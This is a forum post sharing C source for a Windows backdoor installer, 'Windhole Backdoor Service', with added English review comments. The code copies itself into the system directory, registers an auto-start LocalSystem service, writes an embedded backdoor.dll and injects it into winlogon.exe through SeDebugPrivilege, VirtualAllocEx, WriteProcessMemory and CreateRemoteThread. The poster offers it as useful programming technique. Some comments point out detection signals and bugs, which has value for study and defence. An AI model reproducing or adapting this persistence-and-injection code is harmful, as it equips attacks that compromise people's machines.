贴点别人的源码，不错的！有详细的注释。代码不全，这是涉及主要的部分！里面涉及普通常用且又重要的编程思路，所以贴出来啦！
自己是菜鸟,自己不懂藏着也没用,希望对你有用哦
/*---------------------------------------------------------------------
//mysvr.c
//Coder: sjdf
//E-mail: sjdf1@163.com
//Create date: 2002.8.11
//Last modify date: 2003.10.28
//Test platform: Win2000 Adv Server + sp4
---------------------------------------------------------------------*/
/*
 * Review summary (defender's reading of this listing):
 *   main()            -> self-installs as an auto-start Win32 service
 *                        (copies its own image into the system directory)
 *   MyServiceStart()  -> SCM service entry; spawns MyWorkThread, then idles
 *   MyWorkThread()    -> writes an embedded DLL to disk and loads it into
 *                        DESTPROC with CreateRemoteThread + LoadLibraryA
 * The literal names below (service name, display name, file names, target
 * process) are the host-based artefacts this sample leaves behind.
 */
//Header
#include "bkdlldata.h"   /* not in this excerpt; presumably supplies data1..data5 used by MyWorkThread */
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <psapi.h>
#include <winsvc.h>
//---------------------------------------------------------------------
//Global constant
/* Presumably left non-const because SERVICE_TABLE_ENTRY.lpServiceName is a
 * non-const LPTSTR and the array is handed to StartServiceCtrlDispatcher in main(). */
char SERVICENAME[9] = "windhole";
const char DISPLAYNAME[33] = "Windhole Backdoor Service";
const char SRVFILENAME[13] = "windhole.exe";   /* name of the copy placed in the system directory */
const char BDRFILENAME[13] = "backdoor.dll";   /* name of the DLL written by MyWorkThread */
const char DESTPROC[19] = "winlogon.exe";      /* process the DLL is loaded into */
//---------------------------------------------------------------------
//Global variable
SERVICE_STATUS MyServiceStatus;               /* status record reported to the SCM */
SERVICE_STATUS_HANDLE MyServiceStatusHandle;
/* Shared stop flag: set to 1 by MyWorkThread on every exit path and by the
 * control handler; polled by MyServiceStart. Plain int, no synchronization. */
int WillStop = 0;
//---------------------------------------------------------------------
//Function declaration
int AddPrivilege(const char *Name);                 /* defined outside this excerpt */
void MyServiceStart (int argc, char *argv[]);
void MyServiceCtrlHandler (DWORD opcode);
/* NOTE(review): typo -- the definition below is spelled MyWorkThread, so this
 * prototype declares an unrelated, never-defined function. Harmless only
 * because the definition precedes its single use in MyServiceStart. */
DWORD MyWrokThread(void);
DWORD ProcessToPID(const char *InputProcessName);   /* defined outside this excerpt */
//---------------------------------------------------------------------
//Function definition
/**
 * Program entry point.
 *
 * With "-service" as argv[1] it connects to the SCM as the service process
 * (the SCM then calls MyServiceStart). With any other command line it acts
 * as the installer: copies its own image to <system dir>\SRVFILENAME,
 * registers an auto-start service SERVICENAME whose command line is that
 * path plus " -service", and starts it.
 *
 * @return 0 on success, 1 when the copy or the SCM connection fails.
 *         A failed CreateService/StartService is only printed; the
 *         return value stays 0.
 *
 * Observable side effects: a new file in the system directory and a new
 * auto-start service (System log, Service Control Manager event 7045).
 * Note: GetLastError() returns a DWORD; the "%d" used in every printf
 * below is a signed-format mismatch (%lu would match).
 */
int main(int argc,char *argv[])
{
    // If launched with "-service", run as the service: hand over to the SCM dispatcher.
    if ((argc >= 2) && (!lstrcmp(argv[1],"-service")))
    {
        SERVICE_TABLE_ENTRY DispatchTable[] =
        {
            {SERVICENAME, (LPSERVICE_MAIN_FUNCTION)MyServiceStart},
            {NULL, NULL}
        };
        // Blocks until the service stops; MyServiceStart is invoked on another thread.
        if (!StartServiceCtrlDispatcher( DispatchTable))
        {
            return 1;
        }
        return 0;
    }
    // Otherwise install the service automatically.
    // Step 1: copy our own image into the system directory.
    char DestName[MAX_PATH + 1];
    char NowName[MAX_PATH + 1];
    ZeroMemory(DestName,MAX_PATH + 1);
    ZeroMemory(NowName,MAX_PATH + 1);
    if (!GetSystemDirectory(DestName,MAX_PATH))
    {
        printf("GetSystemDirectory() error = %d\nInstall failure!\n",GetLastError());
        return 1;
    }
    // Unbounded lstrcat into a MAX_PATH+1 buffer; only safe while the system
    // directory path is short (no length check anywhere below either).
    lstrcat(DestName,"\\");
    lstrcat(DestName,SRVFILENAME);
    if (!GetModuleFileName(NULL,NowName,MAX_PATH))
    {
        printf("GetModuleFileName() error = %d\nInstall failure!\n",GetLastError());
        return 1;
    }
    // bFailIfExists == 0: an existing copy in the system directory is overwritten.
    if (!CopyFile(NowName,DestName,0))
    {
        printf("CopyFile() error = %d\nInstall failure!\n",GetLastError());
        return 1;
    }
    // Step 2: register the service.
    SC_HANDLE newService, scm;
    // Connect to the SCM; SC_MANAGER_CREATE_SERVICE is the only right requested.
    if (!(scm = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE)))
    {
        printf("OpenSCManager() error = %d\nInstall failure!\n",GetLastError());
        return 1;
    }
    // Append "-service" so that the SCM launches the copy in service mode.
    // DestName now doubles as lpBinaryPathName plus argument; the path is not quoted.
    lstrcat(DestName," -service");
    // lpServiceStartName is NULL, i.e. the service runs as LocalSystem;
    // SERVICE_AUTO_START makes it persist across reboots.
    if (!(newService = CreateService(scm, SERVICENAME, DISPLAYNAME,
                                     SERVICE_ALL_ACCESS,
                                     SERVICE_WIN32_OWN_PROCESS,
                                     SERVICE_AUTO_START,
                                     SERVICE_ERROR_NORMAL,
                                     DestName,
                                     NULL, NULL, NULL, NULL, NULL)))
    {
        printf("CreateService() error = %d\nInstall failure!\n",GetLastError());
    }
    else
    {
        printf("Install success!\n");
        // Second element is an empty string, not a NULL terminator; only the
        // first element is read because dwNumServiceArgs is 1.
        char *pra[] = {"-service", "\0"};
        if (!StartService(newService,1,(const char **)pra))
        {
            printf("StartService() error = %d\nStart service failure!\n",GetLastError());
        }
        else
        {
            printf("Start service Success!\n");
        }
    }
    // newService is closed even when CreateService failed (it is NULL then).
    CloseServiceHandle(newService);
    CloseServiceHandle(scm);
    return 0;
}
//---------------------------------------------------------------------
/**
 * Worker thread started by MyServiceStart.
 *
 * Writes the embedded DLL (data1..data5) to BDRFILENAME, then loads
 * <system dir>\BDRFILENAME into DESTPROC by allocating the path string in
 * the target and starting a remote thread at LoadLibraryA.
 *
 * Sets WillStop = 1 on every exit path, so the service stops after one
 * attempt regardless of outcome.
 *
 * @return 0 when the remote thread was requested, 1 on any earlier failure.
 *
 * Cast to LPTHREAD_START_ROUTINE by the caller although it takes no LPVOID
 * and is not declared WINAPI (see MyServiceStart).
 */
DWORD MyWorkThread(void)
{
    // 4 s delay before doing anything; presumably lets MyServiceStart finish
    // reporting SERVICE_RUNNING -- TODO confirm.
    Sleep(4000);
    FILE *fp;
    // Step 1: write the embedded DLL image (data1..data5, from bkdlldata.h,
    // not visible here) to disk. BDRFILENAME is a relative path, so the file
    // lands in the service process's current directory -- not necessarily the
    // system directory the full path assembled below points at. fwrite/fclose
    // return values are not checked.
    if ((fp = fopen(BDRFILENAME,"wb")) == NULL)
    {
        WillStop = 1;
        return 1;
    }
    fwrite(data1,sizeof(data1),1,fp);
    fwrite(data2,sizeof(data2),1,fp);
    fwrite(data3,sizeof(data3),1,fp);
    fwrite(data4,sizeof(data4),1,fp);
    fwrite(data5,sizeof(data5),1,fp);
    fclose(fp);
    // Step 2: build "<system dir>\BDRFILENAME", the string handed to
    // LoadLibraryA in the target. GetSystemDirectory's result is not checked.
    char FullName[MAX_PATH + 1];
    ZeroMemory(FullName,MAX_PATH + 1);
    GetSystemDirectory(FullName,MAX_PATH);
    lstrcat(FullName,"\\");
    lstrcat(FullName,BDRFILENAME);
    // Opening a system process requires SeDebugPrivilege to be enabled first.
    // AddPrivilege is defined outside this excerpt; its return value is ignored.
    AddPrivilege(SE_DEBUG_NAME);
    HANDLE hRemoteProcess = NULL;
    DWORD Pid = ProcessToPID(DESTPROC);   /* defined outside this excerpt */
    // Step 3: open DESTPROC with the rights needed for cross-process injection.
    // This access-right combination against winlogon.exe is what process-access
    // telemetry (e.g. Sysmon event 10, GrantedAccess) surfaces.
    if ((hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | // allow creating a thread in the target
                                      PROCESS_VM_OPERATION |  // allow VirtualAllocEx/VirtualFreeEx
                                      PROCESS_VM_WRITE |      // allow WriteProcessMemory
                                      PROCESS_VM_READ,        // allow reading the target's memory
                                      0, Pid)) == NULL)
    {
        WillStop = 1;
        return 1;
    }
    char *pDllName = NULL;
    // Step 4: commit lstrlen(FullName)+1 bytes in the target for the path string.
    if ((pDllName = (char *)VirtualAllocEx( hRemoteProcess, NULL, lstrlen(FullName) + 1, MEM_COMMIT, PAGE_READWRITE)) == NULL)
    {
        CloseHandle(hRemoteProcess);
        WillStop = 1;
        return 1;
    }
    // Copy the DLL path into the target's address space. Only lstrlen(FullName)
    // bytes are written; the terminating NUL relies on the freshly committed
    // page being zero-filled.
    if (WriteProcessMemory(hRemoteProcess, pDllName, FullName, lstrlen(FullName), NULL) == 0)
    {
        VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);
        CloseHandle(hRemoteProcess);
        WillStop = 1;
        return 1;
    }
    // Resolve LoadLibraryA in *this* process's kernel32 and reuse that address
    // as the remote start routine -- assumes kernel32 is mapped at the same
    // address in the target.
    PTHREAD_START_ROUTINE pfnStartAddr = NULL;
    if ((pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress( GetModuleHandle(TEXT("kernel32")), "LoadLibraryA")) == NULL)
    {
        VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);
        CloseHandle(hRemoteProcess);
        WillStop = 1;
        return 1;
    }
    DWORD ThreadId = 0;
    // Step 5: LoadLibraryA(pDllName) runs inside DESTPROC on a new thread.
    // The returned thread handle is neither checked nor closed and ThreadId is
    // never read. Cross-process thread creation is the canonical detection
    // point for this technique (Sysmon event 8).
    CreateRemoteThread(hRemoteProcess,  // target process
                       NULL, 0,
                       pfnStartAddr,    // entry address of LoadLibraryA
                       pDllName, 0, &ThreadId);
    // The remote buffer is not freed on this path (whether that is deliberate
    // is not visible here). WillStop is set on success too, so the service
    // stops after this single attempt.
    CloseHandle(hRemoteProcess);
    WillStop = 1;
    return 0;
}
//---------------------------------------------------------------------
/**
 * Service entry point invoked by the SCM through DispatchTable in main().
 *
 * Registers the control handler, reports START_PENDING, spawns
 * MyWorkThread, reports RUNNING, then polls WillStop until the worker or
 * the control handler sets it and finally reports STOPPED.
 *
 * argc/argv are unused. The function is passed to the SCM through a cast
 * to LPSERVICE_MAIN_FUNCTION (whose real signature is DWORD, LPTSTR *).
 */
void MyServiceStart (int argc, char *argv[])
{
    if (!(MyServiceStatusHandle = RegisterServiceCtrlHandler(SERVICENAME,(LPHANDLER_FUNCTION)MyServiceCtrlHandler)))
    {
        return;
    }
    // Initial status: START_PENDING, accepting STOP and PAUSE/CONTINUE controls.
    MyServiceStatus.dwServiceType = SERVICE_WIN32;
    MyServiceStatus.dwCurrentState = SERVICE_START_PENDING;
    MyServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
    MyServiceStatus.dwWin32ExitCode = 0;
    MyServiceStatus.dwServiceSpecificExitCode = 0;
    MyServiceStatus.dwCheckPoint = 0;
    MyServiceStatus.dwWaitHint = 0;
    if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))
    {
        return;
    }
    DWORD Threadid;
    // Initialization code goes here. Handle error condition
    // The entire "initialization" is spawning MyWorkThread. That function is
    // declared DWORD (void) without WINAPI and takes no LPVOID parameter, so
    // the cast to LPTHREAD_START_ROUTINE hides a signature mismatch
    // (presumably also a calling-convention mismatch on x86 builds -- not
    // verifiable here). The thread handle is never closed.
    if (!CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)MyWorkThread,NULL, 0, &Threadid))
    {
        // Report STOPPED with the Win32 error. dwServiceSpecificExitCode is
        // only consulted when dwWin32ExitCode == ERROR_SERVICE_SPECIFIC_ERROR,
        // so the second GetLastError() assignment has no effect.
        MyServiceStatus.dwCurrentState = SERVICE_STOPPED;
        MyServiceStatus.dwCheckPoint = 0;
        MyServiceStatus.dwWaitHint = 0;
        MyServiceStatus.dwWin32ExitCode = GetLastError();
        MyServiceStatus.dwServiceSpecificExitCode = GetLastError();
        SetServiceStatus(MyServiceStatusHandle, &MyServiceStatus);
        return;
    }
    // Initialization complete - report running status.
    // RUNNING is reported immediately; the worker acts asynchronously after
    // its own 4 s delay.
    MyServiceStatus.dwCurrentState = SERVICE_RUNNING;
    MyServiceStatus.dwCheckPoint = 0;
    MyServiceStatus.dwWaitHint = 0;
    if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))
    {
        return;
    }
    // Idle until the worker or the control handler sets WillStop. The flag is
    // a plain int read here and written from two other threads; there is no
    // synchronization beyond the opaque Sleep call.
    while(WillStop == 0)
    {
        Sleep(200);
    }
    // Report STOPPED. Because MyWorkThread sets WillStop on every exit path,
    // the service is short-lived: it runs once at boot and stops itself shortly
    // after. An auto-start service that exits moments after starting is itself
    // a useful hunting signal.
    MyServiceStatus.dwWin32ExitCode = 0;
    MyServiceStatus.dwCurrentState = SERVICE_STOPPED;
    MyServiceStatus.dwCheckPoint = 0;
    MyServiceStatus.dwWaitHint = 0;
    SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus);
    return;
}
//---------------------------------------------------------------------
/**
 * SCM control handler registered by MyServiceStart.
 *
 * Only the PAUSE case is shown here; the function continues past this block
 * (the remaining cases and the closing of the switch are outside it). PAUSE
 * only updates the in-memory status record and does not call
 * SetServiceStatus, so the SCM is not told about the new state here.
 */
void MyServiceCtrlHandler (DWORD Opcode)
{
    switch(Opcode)
    {
    case SERVICE_CONTROL_PAUSE:
        // Do whatever it takes to pause here.
        MyServiceStatus.dwCurrentState = SERVICE_PAUSED;
        break;
case SERVICE_CONTROL_CONTINUE: // Do whatever it takes to continue here. MyServiceStatus.dwCurrentState = SERVICE_RUNNING; break;
case SERVICE_CONTROL_STOP: // Do whatever it takes to stop here. MyServiceStatus.dwWin32ExitCode = 0; MyServiceStatus.dwCurrentState = SERVICE_STOPPED; MyServiceStatus.dwCheckPoint = 0; MyServiceStatus.dwWaitHint = 0;
SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus);
WillStop = 1; return;
case SERVICE_CONTROL_INTERROGATE: // Fall through to send current status.